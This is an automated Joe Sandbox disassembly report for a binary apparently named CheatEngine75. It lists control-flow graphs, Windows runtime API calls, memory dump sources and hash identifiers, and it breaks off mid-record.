                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 551326122-0
                                                                                                                                                                                                                                      • Opcode ID: bcd546aae96d5f6eceae93851ed89e383ce9ee2337ca36012c453b32a3828e55
                                                                                                                                                                                                                                      • Instruction ID: eb79210572058b9c72868204d0dcef03328ed103d0d3767f07b97633bf02106e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcd546aae96d5f6eceae93851ed89e383ce9ee2337ca36012c453b32a3828e55
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6511CAB0A00318ABDB259F758C46FEB77BCEB89704F00405EE606D7180CBB48A458BE0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 6B60096A
                                                                                                                                                                                                                                        • Part of subcall function 6B6017FC: InitializeSListHead.KERNEL32(6B6964F8,6B600974,6B688D10,00000010,6B600905,?,?,?,6B600B2D,?,00000001,?,?,00000001,?,6B688D58), ref: 6B601801
                                                                                                                                                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6B6009D4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 3231365870-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 4160eb88159699aceecaf39e31c5b3300b9415a031f25ed8c9a4cbfd0263ad3f
                                                                                                                                                                                                                                      • Instruction ID: 07b8d89714e3153980d42c29382d41fd4ad670a424b2d541c765edb1e2fb20c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4160eb88159699aceecaf39e31c5b3300b9415a031f25ed8c9a4cbfd0263ad3f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1621F0F254936E9AEF086FBB86027DC7361AF5232DF144059E684671C2DF3E4101DB6A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 332 6b4d0e1e-6b4d0e4a GetModuleFileNameW 333 6b4d0e4c-6b4d0e4e 332->333 334 6b4d0e85 332->334 333->334 336 6b4d0e50-6b4d0e7d PathFindExtensionW call 6b4d0911 333->336 335 6b4d0e87-6b4d0e93 call 6b60038c 334->335 339 6b4d0e82-6b4d0e83 336->339 339->335
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6B4D0E42
                                                                                                                                                                                                                                      • PathFindExtensionW.SHLWAPI(?), ref: 6B4D0E58
                                                                                                                                                                                                                                        • Part of subcall function 6B4D0911: __EH_prolog3_GS.LIBCMT ref: 6B4D091B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExtensionFileFindH_prolog3_ModuleNamePath
                                                                                                                                                                                                                                      • String ID: %Ts%Ts.dll
                                                                                                                                                                                                                                      • API String ID: 3433622546-1896370695
                                                                                                                                                                                                                                      • Opcode ID: 75a48ac2f9da7555e234c528436d028bcffaffd5c100e49abf6d3f8cea475a5c
                                                                                                                                                                                                                                      • Instruction ID: 8a586cdd2cc16e0f7ec4aec2225a3aba98f5a55943b5aa6bf4f58297b5642847
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75a48ac2f9da7555e234c528436d028bcffaffd5c100e49abf6d3f8cea475a5c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B016D72A00119BBDB11EBA4DD55EEF73F8EF49700F0000AA9511D7240EB74EA09DB90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __snprintf_s.LIBCMT ref: 6B4D1583
                                                                                                                                                                                                                                        • Part of subcall function 6B4CE0A9: __vsnwprintf_s_l.LEGACY_STDIO_DEFINITIONS ref: 6B4CE0BE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __snprintf_s__vsnwprintf_s_l
                                                                                                                                                                                                                                      • String ID: LOC
                                                                                                                                                                                                                                      • API String ID: 3877413697-519433814
                                                                                                                                                                                                                                      • Opcode ID: 1d8e611c8bf5fd9e964b4065bd6b4a2424f8ba0550f70335921b3a7b8d3b6e06
                                                                                                                                                                                                                                      • Instruction ID: bd59b15c23aa0e955fb2fc1ef3333316a6648298e9bfbea0303c83506825ac0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d8e611c8bf5fd9e964b4065bd6b4a2424f8ba0550f70335921b3a7b8d3b6e06
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA1106B1981128BBDB006FB59D52FCA33A89F05764F0004AAE906AB0D0EF3CDD404BA1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4D091B
                                                                                                                                                                                                                                        • Part of subcall function 6B4D8CD8: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,?,00000108,6B4D0E82,?,?), ref: 6B4D8D0B
                                                                                                                                                                                                                                        • Part of subcall function 6B4D8CD8: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6B4D8D1B
                                                                                                                                                                                                                                        • Part of subcall function 6B4D8CD8: EncodePointer.KERNEL32(00000000,?,?,?,00000108,6B4D0E82,?,?), ref: 6B4D8D24
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressEncodeH_prolog3_HandleModulePointerProc
                                                                                                                                                                                                                                      • String ID: y
                                                                                                                                                                                                                                      • API String ID: 2428170207-4225443349
                                                                                                                                                                                                                                      • Opcode ID: be59e9fc15a8dd2cbc93ea5a5d49908ca57638bda76c4b2aa789c17114f6aedf
                                                                                                                                                                                                                                      • Instruction ID: e44ef5598e7e74f7b97cbb269cc58c7fd7406c419bd53dcdd6c9cfdefd7f44a1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be59e9fc15a8dd2cbc93ea5a5d49908ca57638bda76c4b2aa789c17114f6aedf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19214AB6D01128ABDB259B64CC61FDE7378AF14718F0042D5A98467280DBB89FC48F95

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 408 6b4d3951-6b4d3962 call 6b600cc8 411 6b4d398d-6b4d3994 call 6b600c2d 408->411 412 6b4d3964-6b4d3972 call 6b4d4512 408->412 417 6b4d3974-6b4d397d call 6b4d02bd 412->417 418 6b4d3982-6b4d3988 call 6b4d4586 412->418 421 6b4d3980 417->421 418->411 421->418
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 6B4D3958
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4586: EnterCriticalSection.KERNEL32(6B694508,?,?,?,?,6B4D396B,00000010,00000008,6B4D027A,6B4D02BD,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D4543
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4586: InitializeCriticalSection.KERNEL32(00000000,?,?,?,6B4D396B,00000010,00000008,6B4D027A,6B4D02BD,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D4559
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4586: LeaveCriticalSection.KERNEL32(6B694508,?,?,?,6B4D396B,00000010,00000008,6B4D027A,6B4D02BD,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D4567
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4586: EnterCriticalSection.KERNEL32(00000000,?,?,?,6B4D396B,00000010,00000008,6B4D027A,6B4D02BD,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D4574
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 1641187343-1841850333
                                                                                                                                                                                                                                      • Opcode ID: b4eab41c468084a7fb1977c70272167b191f7e24d3d5a72a3352dfbc05c89b11
                                                                                                                                                                                                                                      • Instruction ID: 247b99c5ddaa18c0baf8ed06960def8619367b0c6457a64be613e41c57af5722
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4eab41c468084a7fb1977c70272167b191f7e24d3d5a72a3352dfbc05c89b11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03E04F7051520ADFEB54AF70C526F8CB770BF51369F204579E2816A2D0DFB88990DF51

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 423 6b4d3c77-6b4d3ca7 SetErrorMode * 2 call 6b4d0251 * 2 428 6b4d3cbd-6b4d3cc7 call 6b4d0251 423->428 429 6b4d3ca9-6b4d3cb8 call 6b4d3cd5 423->429 433 6b4d3cce-6b4d3cd2 428->433 434 6b4d3cc9 call 6b4d17ae 428->434 429->428 434->433
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3C7D
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3C89
                                                                                                                                                                                                                                        • Part of subcall function 6B4D3CD5: GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 6B4D3D10
                                                                                                                                                                                                                                        • Part of subcall function 6B4D3CD5: PathFindExtensionW.SHLWAPI(?), ref: 6B4D3D2A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$ExtensionFileFindModuleNamePath
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1764437154-0
                                                                                                                                                                                                                                      • Opcode ID: 861458795a1592e57b109cd513c01b504f51c02fe374deece0d55267c8359074
                                                                                                                                                                                                                                      • Instruction ID: 99c0551f9027c7a5c3e657664cdfe50dac5003f310ec7da0ffb2b7eba8262719
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 861458795a1592e57b109cd513c01b504f51c02fe374deece0d55267c8359074
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F09A719113049FDB20AFB5C02EF497BA8EF04B24F00849EE8089B311DB79D842CBE2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B4D8C5F: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6B4D1467,6B4D09A5,00000003,?,00000004,6B4D09A5), ref: 6B4D8C71
                                                                                                                                                                                                                                        • Part of subcall function 6B4D8C5F: GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6B4D8C81
                                                                                                                                                                                                                                        • Part of subcall function 6B4D8C5F: EncodePointer.KERNEL32(00000000,?,6B4D1467,6B4D09A5,00000003,?,00000004,6B4D09A5), ref: 6B4D8C8A
                                                                                                                                                                                                                                      • __snprintf_s.LIBCMT ref: 6B4D149C
                                                                                                                                                                                                                                        • Part of subcall function 6B4CE0A9: __vsnwprintf_s_l.LEGACY_STDIO_DEFINITIONS ref: 6B4CE0BE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressEncodeHandleModulePointerProc__snprintf_s__vsnwprintf_s_l
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3155208388-0
                                                                                                                                                                                                                                      • Opcode ID: 8a70048d9669092502778e51a6353a57db00cde556d71567c5df512c261d5165
                                                                                                                                                                                                                                      • Instruction ID: b3a48eeadaebbbe523bb537d8942d7d2c12878e579046db958b6676da07d184e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a70048d9669092502778e51a6353a57db00cde556d71567c5df512c261d5165
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65110D71940128ABDF046FB5CD96FDE33BCAF01714F0044AAA914A71C0EB3C9A0487A1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 468 6b4cdba5-6b4cdbc0 call 6b600d40 471 6b4cdbd8-6b4cdbf7 LoadLibraryExW call 6b4cdc13 468->471 472 6b4cdbc2-6b4cdbc9 468->472 476 6b4cdbfc 471->476 472->471 474 6b4cdbcb-6b4cdbd6 call 6b4cdcf9 472->474 474->471 478 6b4cdbfe-6b4cdc0d 474->478 476->478
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,?,6B67B578,00000010,6B4C815C,00000000,00000000,00000800,?,00000000), ref: 6B4CDBE5
                                                                                                                                                                                                                                        • Part of subcall function 6B4CDCF9: OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,-00000034,?,6B4D33E8,00000000,6B67C1E8,00000010,6B4D3F31,00000000,?,00000000), ref: 6B4CDD0D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DebugLibraryLoadOutputString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 137895185-0
                                                                                                                                                                                                                                      • Opcode ID: dd0033e6ed5956e7836de316b96270f9c051a9102e2a56ae32e282da708cd896
                                                                                                                                                                                                                                      • Instruction ID: ec53cebfdec674e0cac3fb329958587d3c189add4631858573cea1173de10e7f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd0033e6ed5956e7836de316b96270f9c051a9102e2a56ae32e282da708cd896
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF062BAD84319DFEF109FA5C804B9E77B0FB08726F004519E521A2290D7BD9145CF51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6B4D02C4
                                                                                                                                                                                                                                        • Part of subcall function 6B4D357A: LocalAlloc.KERNEL32(00000040,00000000,?,6B4D3B5D,00000010,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3582
                                                                                                                                                                                                                                        • Part of subcall function 6B4CFEA2: __EH_prolog3_catch.LIBCMT ref: 6B4CFEA9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocH_prolog3H_prolog3_catchLocal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1948148156-0
                                                                                                                                                                                                                                      • Opcode ID: 5dec160f113ec9ac43d1b18142b1c30ace80a11059d9697c5ab71dfabc215504
                                                                                                                                                                                                                                      • Instruction ID: ec547b07e4b92d20540938b6a9142a1839420f7ff2918f10ef8df1afc04d6659
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dec160f113ec9ac43d1b18142b1c30ace80a11059d9697c5ab71dfabc215504
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE012F5A9263457EB559E754A23B5D6B506F00F88F40015AE6407B381CFBD4D4187C6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,6B4D3B5D,00000010,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3582
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3494564517-0
                                                                                                                                                                                                                                      • Opcode ID: 603886cd130a0237f474d9db134c529dff7915508ef27cd73f091ebd1c2fb21e
                                                                                                                                                                                                                                      • Instruction ID: 870c80c44e088347da43dba94add51a9e1ca86a2a6c26fe0142821fc8e220e87
